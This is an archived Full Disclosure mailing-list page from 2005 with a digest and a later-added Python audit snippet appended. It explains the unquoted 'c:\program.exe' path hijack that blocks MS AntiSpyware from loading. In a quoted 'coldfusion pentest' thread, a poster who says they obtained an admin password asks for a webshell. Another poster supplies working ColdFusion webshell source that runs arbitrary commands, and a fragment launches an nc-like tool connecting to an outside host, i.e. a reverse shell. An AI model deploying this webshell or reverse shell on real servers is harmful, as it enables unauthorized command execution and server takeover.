Full Disclosure mailing list archives
RE: Useless tidbit (MS AntiSpyware)
From: Steven Rakick <stevenrakick () yahoo com>
Date: Tue, 10 May 2005 07:30:03 -0700 (PDT)
Interesting. Has this always been that way? While it's not a huge gaping hole, it's definitely concerning. At least to me.

Steve

-----Original Message-----
From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of pretty vacant
Sent: Tuesday, May 10, 2005 9:53 AM
To: James Tucker
Cc: full-disclosure () lists grok org uk
Subject: Re: [Full-disclosure] Useless tidbit

You may or may not know that Windows applications often use the registry to store information about where to find applications within their file system. Due to the way in which Windows handles filenames, situations where this information is stored in an unquoted fashion can leave the application open to an attack commonly referred to as the "Program.exe trick".

As you know, it's quite common to have files and/or directories with spaces in the name (e.g. C:\Program Files). Windows is unique in that it essentially doesn't exactly know what it's doing if the command isn't quoted and contains spaces. For example, look at the following command:

    c:\program files\windows media player\wmplayer

If unquoted, Windows tries the following:

1st try
    Execute: c:\program.exe
    Arg1: files\windows
    Arg2: media
    Arg3: player\wmplayer

2nd try
    Execute: "c:\program files\windows.exe"
    Arg1: media
    Arg2: player\wmplayer

3rd try
    Execute: "c:\program files\windows media"
    Arg1: player\wmplayer

4th try
    Execute: "c:\program files\windows media player\wmplayer.exe"

Well, in the case of MS AntiSpyware (and hundreds of other applications), it starts up by executing "AntiSpywareMain.exe", which in turn displays a nice splash screen and performs some other misc activities before calling gsasDtServ.exe. The problem is that the execution of gsasDtServ.exe is unquoted: while the app tries to execute c:\program files\microsoft antispyware\gsasDtServ.exe, if c:\program.exe exists, it will be executed instead and MS AntiSpyware never actually gets loaded.

With XPSP2, the OS will actually warn you about files like c:\Program.bat or c:\Program.exe, but not of c:\program files\internet.exe. Sadly, this isn't uncommon and when I tested this on my system the first time, 7 applications were executed over a 48 hour period. Try it for yourself. My Program.exe logs the executing user and command args to c:\program.log.

On Tue, 10 May 2005, James Tucker wrote:
It appears this was a "trick" that I missed, can you provide more info?
thanks.
On 5/9/05, pretty vacant <optimist () eurocompton net> wrote:
Interesting tidbit. The old c:\program.exe trick prevents MS
Anti-Spyware from loading at login. :)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
full-disclosure-request () lists grok org uk wrote:

Today's Topics:

   1. List Charter (John Cartwright)
   2. Re: Fwd: GWAVA Sender Notification (Content filter) (James Tucker)
   3. Re: coldfusion pentest (fatb)
   4. Re: coldfusion pentest (fatb)

----------------------------------------------------------------------

Message: 1
Date: Tue, 10 May 2005 10:02:23 +0100
From: John Cartwright
Subject: [Full-disclosure] List Charter
To: full-disclosure () lists grok org uk
Message-ID: <20050510090223.GA21817 () grok org uk>
Content-Type: text/plain; charset=us-ascii

Hi

FYI: I have disabled monthly password reminders due to the increasing problem of archive sites storing them verbatim without filtering. Anyone running such an archive is encouraged to change their password if necessary. A password reminder is always available via the web interface in any case.

Additionally I have moved to more secure random passwords for new members.

Cheers
- John

[Full-Disclosure] Mailing List Charter
John Cartwright

- Introduction & Purpose -

This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk.
The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia.

- Subscription Information -

Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-request () lists grok org uk; send the word 'help' in either the message subject or body for details.

- Moderation & Management -

The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/.

- Acceptable Content -

Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list.

- Posting Guidelines -

The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list.
Quoting should not exceed that which is necessary to convey context; this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure () lists grok org uk. Do not send subscription/unsubscription mails to this address; use the -request address mentioned above.

- Charter Additions/Changes -

The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a consensus has been reached.

------------------------------

Message: 2
Date: Tue, 10 May 2005 10:11:56 +0100
From: James Tucker
Subject: Re: [Full-disclosure] Fwd: GWAVA Sender Notification (Content filter)
To: "Valdis.Kletnieks () vt edu"
Cc: full-disclosure () lists grok org uk
Message-ID:
Content-Type: text/plain; charset=ISO-8859-1

marketing is a "wonderful" thing.

On 5/10/05, Valdis.Kletnieks () vt edu wrote:
> On Tue, 10 May 2005 02:32:41 BST, James Tucker said:
> > Surely this kind of message is a really bad idea.
> You know it, I know it, and the A/V vendors know it.
> > What is the possible true business value of such a filter?
> The true business value is for the A/V vendor, who can blat out a free spam to the forged MAIL FROM: address (which is probably scraped off a disk by the worm/virus and therefore likely an actual address). In this case, the bozos at GWAVA can spam you about finding something they didn't consider acceptable.
> > What is the potential impact upon security to disclose the information that this mail does?
> It demonstrates that the site running it is lame enough to still be running A/V software that spams people.
> > What is the cost of deployment of this system against the costs related to its potential, and actual effects?
> The GWAVA people don't care. They've been paid for the product already, and they're not the ones paying for the bandwidth. Remember - you're talking here about a market segment *founded* on the business model that *partially* patching some other vendor's broken software will lead to a permanent gravy train. Once you've wrapped your brain around the morals and ethics of that business model, it's obviously a very tiny step to spamming other people about the wonders of the product.
------------------------------

Message: 3
Date: Tue, 10 May 2005 17:12:00 +0800
From: "fatb"
Subject: Re: [Full-disclosure] coldfusion pentest
To: "Javier Reoyo"
Cc: full-disclosure () lists grok org uk
Message-ID: <007001c55540$cdd9d440$3801a8c0@bill>
Content-Type: text/plain; charset="gb2312"

thx :) the script from securiteam was from Kurt Grutzmacher originally; it could not run on my box and I successfully got a working shell by uploading a nc-like tool and using the following script to run it:

    arguments="-connect 1.1.1. 9999" timeout="20">

no matter how, I thought many guys who like me need a working cf webshell, because the upload script does not allow us to upload exe or some other kinds of files

----- Original Message -----
From: "Javier Reoyo"
To:
Sent: Tuesday, May 10, 2005 4:31 PM
Subject: Re: [Full-disclosure] coldfusion pentest

Hi fatb, this is from the securiteam mailing. Try it.

ColdFusion Web Shell
------------------------------------------------------------------------

SUMMARY

DETAILS

The following source code will generate a web based shell whenever it is executed under the ColdFusion environment.

Tool source code:

    <html>
    <body>
    <cfoutput>
    <table>
    <form method="POST" action="cfexec.cfm">
    <tr>
    <td>Command:
    <td><input type=text name="cmd" size=50 <cfif isdefined("form.cmd")> value="#form.cmd#" >
    <br>
    <tr>
    <td>Options:
    <td><input type=text name="opts" size=50 <cfif isdefined("form.opts")> value="#form.opts#" ><br>
    <tr>
    <td>Timeout:
    <td><input type=text name="timeout" size=4 <cfif isdefined("form.timeout")> value="#form.timeout#" <cfelse> value="5"
    <input type=submit value="Exec" >
    <cfsavecontent variable="myVar">
    <cfexecute name = "#Form.cmd#" arguments = "#Form.opts#" timeout = "#Form.timeout#">
    <pre>
    #myVar#

ADDITIONAL INFORMATION

The information has been provided by Kurt Grutzmacher.

========================================

----- Original Message -----
From: "fatb"
To:
Cc:
Sent: Tuesday, May 10, 2005 4:43 AM
Subject: [Full-disclosure] coldfusion pentest

Hi all guys

I've succeeded in getting the admin's passwd of the web interface and I can upload any kinds of files to the server. The server is running coldfusion 4.5 with iis 5.0 but I can not find a coldfusion webshell to continue. Could anybody be kind enough to send me a working coldfusion webshell? thx in advance!
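As an added example (not from the post, and not Microsoft's or any vendor's code), the lookup order pretty vacant describes modelled in Python from the defender's side: it lists the paths Windows would try for an unquoted command and rewrites the entry so only the intended executable is ever run. The registry-style entries are constructed sample values, and stopping at the first token that ends in a known executable extension is an assumption standing in for the real loader's file-exists check.

```python
# Added example (not Microsoft's code): models the unquoted-path lookup order
# from the post and audits registry-style name -> command entries for it.
EXEC_EXTS = (".exe", ".com", ".bat", ".cmd")

def candidate_executables(command_line: str) -> list:
    """Files Windows would try, in order, for one command line: unquoted text
    up to each space is tried as the executable (.exe appended if it has no
    extension) and the rest becomes arguments. The real loader stops at the
    first file that exists; for static auditing we assume (simplification) the
    first prefix ending in an executable extension is the intended program."""
    line = command_line.strip()
    if line.startswith('"'):  # quoted: only the quoted path is tried
        end = line.find('"', 1)
        return [line[1:end] if end > 0 else line[1:]]
    tokens = line.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        prefix = " ".join(tokens[:i])
        if prefix.lower().endswith(EXEC_EXTS):
            candidates.append(prefix)
            break
        candidates.append(prefix + ".exe")
    return candidates

def quote_command(command_line: str) -> str:
    """Quote the executable part so no shorter prefix is ever tried."""
    line = command_line.strip()
    if line.startswith('"'):
        return line
    tokens = line.split(" ")
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(EXEC_EXTS):
            exe, rest = " ".join(tokens[: i + 1]), " ".join(tokens[i + 1 :])
            return f'"{exe}"' + (f" {rest}" if rest else "")
    return f'"{line}"'

def audit_image_paths(entries: dict) -> dict:
    """Map each hijackable entry to the paths to verify absent and the fix."""
    findings = {}
    for name, cmd in entries.items():
        cands = candidate_executables(cmd)
        if len(cands) > 1:  # a shorter prefix would be tried first
            findings[name] = {"hijack_paths": cands[:-1], "fixed": quote_command(cmd)}
    return findings

# Constructed sample Run-key values, not real registry contents.
SAMPLE_RUN_ENTRIES = {
    "AntiSpyware": r"c:\program files\microsoft antispyware\gsasDtServ.exe",
    "Updater": r'"C:\Program Files\Vendor\updater.exe" /background',
    "Agent": r"C:\Tools\agent.exe -s",
}
```

Feeding real Run-key or service ImagePath values through audit_image_paths gives the list of files (c:\program.exe and friends) whose absence is worth confirming and monitoring, alongside the quoted value to put back.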
Current thread:
- RE: Useless tidbit (MS AntiSpyware) Steven Rakick (May 10)
- RE: Useless tidbit (MS AntiSpyware) Nick FitzGerald (May 10)
- Re: Useless tidbit (MS AntiSpyware) James Tucker (May 10)
- RE: Useless tidbit (MS AntiSpyware) Randall M (May 11)
- Re: Useless tidbit (MS AntiSpyware) byte busters (May 11)
- Re: Useless tidbit (MS AntiSpyware) Kurt Buff (May 11)
- Re: Useless tidbit (MS AntiSpyware) Valdis . Kletnieks (May 11)
- RE: Useless tidbit (MS AntiSpyware) Nick FitzGerald (May 10)
- <Possible follow-ups>
- Re: Useless tidbit (MS AntiSpyware) Des Ward (May 12)